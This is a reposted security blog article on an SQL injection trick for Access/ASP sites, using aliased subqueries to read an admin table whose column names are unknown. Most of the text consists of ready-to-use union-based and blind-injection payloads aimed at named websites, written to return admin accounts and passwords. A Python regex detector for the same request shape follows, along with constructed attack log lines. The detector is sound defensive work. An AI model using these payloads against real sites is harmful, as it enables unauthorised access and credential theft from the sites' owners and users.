SQL injection trick: using a subquery to ignore field names

Published: 2017-3-10 09:55


Author: 律师'小窝    Source: 51Testing软件测试网 (editorial repost)

  I previously reposted an article on the Access offset injection technique (table name known, column names unknown). I found a case online, but that method still failed, so I had no choice but to keep digging for material, and that is how this article came about.
  The applicable situation is the same as in the previous article: the table name is known but the field names are not. This method is simpler to apply.
  http://www.am0s.com/admin/view_ly.asp?lyid=5 union select 1,2,3,4,5,6,7 from admin
  This confirms that the target query has 7 fields, of which positions 2, 3, 5 and 6 are echoed to the page.
  http://www.am0s.com/admin/view_ly.asp?lyid=5 union select 1,2,3,4,5,6,7 from(select * from admin order by 8)
  Using order by, guess that the admin table has 8 fields in total, then build a subquery that assigns an alias to each field:
  select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5,6 as field_6,7 as field_7,8 as field_8 from admin where 1=2 union select * from admin
  Finally, query this subquery's result set (the aliases can be selected directly):
  http://lnhqy.com/admin/view_ly.asp?lyid=5 union select 1,field_1,field_2,4,field_3,6,7 from(select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5,6 as field_6,7 as field_7,8 as field_8 from admin where 1=2  union select * from admin)
  This returns the admin account and password directly.
  When the database is Access, the injection also works without explicit aliases, because Access automatically assigns aliases to fields that have none (Expr1000, Expr1001, ...):
  http://www.am0s.com/admin/view_ly.asp?lyid=5 union select 1 as x,2 as xx,Expr1001,4 as xxxx,Expr1002,6 as xxxxxx, 7 as xxxxxxx from(select 1,2,3,4,5,6,7,8 from admin where 1=2 union select * from admin )
  To add a condition, simply nest one more layer of subquery:
  union select 1,2,3,field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5
  from(
  select * from (
  select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5
  from admin
  where 1=2
  union select * from admin)
  where field_1 not in (1)
  )
  For blind injection (when the page response differs between true and false), it can be done like this:
  select title,time,author,content from article where id=999999999 or
  (
  select top 1 len(field_1) from(
  select 1 as field_1,2,3,4,5 from admin
  where 1=2
  union select * from admin)
  )>0
  Or like this (for cases where repeated substitution always raises an error, or where the only difference is a 500 versus a 200 response):
  select title,time,author,content from article where id=999999999 or
  iif(
  (select top 1 len(field_1) from(
  select 1 as field_1,2,3,4,5 from admin
  where 1=2 union select * from admin)
  )>0,
  1,
  (select 2 from multi_rows_table)
  )=1
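As an added example (not part of the original post), here is a small Python detector for the request shape this article describes: a union select whose from clause is a parenthesised subquery, combined with numeric-literal aliases such as field_N, Access's auto-generated Expr100x names, the where 1=2 filler, or a union nested inside the subquery. The log lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Indicators that together characterise the alias-subquery payload shape
# discussed in the article (patterns constructed for this example).
PATTERNS = {
    "union_from_subquery": re.compile(r"union\s+select\b.*?\bfrom\s*\(\s*select\b", re.I | re.S),
    "nested_union": re.compile(r"\(\s*select\b[^()]*\bunion\s+select\b", re.I | re.S),
    "alias_columns": re.compile(r"\b\d+\s+as\s+\w+", re.I),      # e.g. "1 as field_1"
    "access_auto_alias": re.compile(r"\bExpr1\d{3}\b", re.I),     # Expr1000, Expr1001, ...
    "where_1_eq_2": re.compile(r"\bwhere\s+1\s*=\s*2\b", re.I),  # empty-row filler
}

def classify_request(raw_url):
    """Return the names of the indicators found in a URL or query string."""
    decoded = unquote_plus(raw_url)  # normalise %20 and + before matching
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]

def is_subquery_union_injection(raw_url):
    """Flag a request when the 'union ... from (select ...)' shape appears
    together with at least one of the alias or filler indicators."""
    hits = set(classify_request(raw_url))
    secondary = {"alias_columns", "access_auto_alias", "where_1_eq_2", "nested_union"}
    return "union_from_subquery" in hits and bool(hits & secondary)

# Constructed sample access-log lines (request line and status only).
SAMPLE_LOG = [
    "GET /view_ly.asp?lyid=5 200",
    "GET /view_ly.asp?lyid=5%20union%20select%201,2,3,4,5,6,7%20from(select%201%20as%20field_1,"
    "2,3,4,5,6,7,8%20from%20admin%20where%201=2%20union%20select%20*%20from%20admin) 200",
    "GET /view_ly.asp?lyid=5%20union%20select%201%20as%20x,Expr1001,3%20from(select%201,2,3%20from%20admin) 500",
    "GET /search.asp?q=union+station 200",
]

def scan_log(lines):
    """Return only the log lines that match the injection shape."""
    return [line for line in lines if is_subquery_union_injection(line)]

if __name__ == "__main__":
    for line in scan_log(SAMPLE_LOG):
        print("suspicious:", line, classify_request(line))
```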